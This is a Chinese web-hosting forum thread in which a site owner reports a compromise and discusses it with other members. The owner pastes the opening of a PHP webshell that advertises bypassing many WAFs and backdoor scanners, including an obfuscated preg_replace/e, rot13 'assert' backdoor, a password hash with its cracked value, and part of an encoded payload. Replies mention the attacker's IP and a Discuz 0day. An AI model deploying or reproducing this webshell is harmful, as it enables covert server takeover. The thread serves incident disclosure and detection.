全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 5273|回复: 16
打印 上一主题 下一主题

可绕过安全狗、360WAF、百度云、阿里云Waf、牛盾、云盾、...

[复制链接]
跳转到指定楼层
1#
发表于 2018-10-8 15:08:13 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
本帖最后由 蓝洛水深 于 2018-10-8 16:17 编辑
<?php
error_reporting(E_ERROR);
header("content-Type: text/html; charset=gb2312");
ini_set('max_execution_time',0);
ini_set('memory_limit','8000M');
define('PASSWD','b55901cdec0d09c45e4766f4a62bee40');/*默认是admin,MD5加密方式*/
define('VERSION','Bypass Waf Php Script(可绕过安全狗、360WAF、百度云、阿里云Waf、牛盾、云盾、以及冷门Waf、市面所有后门检测工具');
define('THISFILE',str_replace(array('\\','//'),array('/','/'),__FILE__));
define('THISDIR',dirname(THISFILE).'/');
define('ROOTDIR',strtr(THISFILE,array($_SERVER['PHP_SELF'] => '')).'/');
preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[cntr]);'),"saft");
$pBVzO57KOVp='ID8+PD9waHAgZn


tools.php.tar.gz (28.31 KB, 下载次数: 304)

b55901cdec0d09c45e4766f4a62bee40
解密后
qianjunlin33


最近收到各种木马,一个比一个强,头大
360、百度、云锁,已经确认都没有用


已经查到一个攻击IP
您查询的IP:198.1.175.249
本站数据:美国
参考数据1:美国加利福尼亚州洛杉矶 serveryou.com
参考数据2:美国
兼容IPv6地址:::C601:AFF9
映射IPv6地址:::FFFF:C601:AFF9
和对方服务提供商进行了工单投诉,对这家不熟,不知道哪位大佬熟悉
推荐
 楼主| 发表于 2018-10-8 16:40:15 | 只看该作者
mslxd 发表于 2018-10-8 15:46
这个后门是什么原理

discuz的0day
15#
发表于 2018-10-8 17:55:05 | 只看该作者
这个帖子的完整标题是什么???????嗯哼?
14#
发表于 2018-10-8 17:44:09 | 只看该作者
蓝洛水深 发表于 2018-10-8 17:17
我找到了,discuz的0day,创始人密码这里

能详说下吗
13#
发表于 2018-10-8 17:34:31 | 只看该作者
蓝洛水深 发表于 2018-10-8 17:17
我找到了,discuz的0day,创始人密码这里

求姿势·~~~
12#
 楼主| 发表于 2018-10-8 17:17:08 | 只看该作者
bob1987 发表于 2018-10-8 16:46
我觉得一句话好找,关键漏洞难找,你首先要能上传啊。。

我找到了,discuz的0day,创始人密码这里
11#
发表于 2018-10-8 16:46:53 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
9#
 楼主| 发表于 2018-10-8 16:02:43 | 只看该作者

扫不干净,不然也不会30号17点修复,21又被修改
8#
发表于 2018-10-8 15:46:49 | 只看该作者
这个后门是什么原理
7#
发表于 2018-10-8 15:44:30 | 只看该作者

D盾可以扫出来
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-12-31 08:50 , Processed in 0.082977 second(s), 14 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表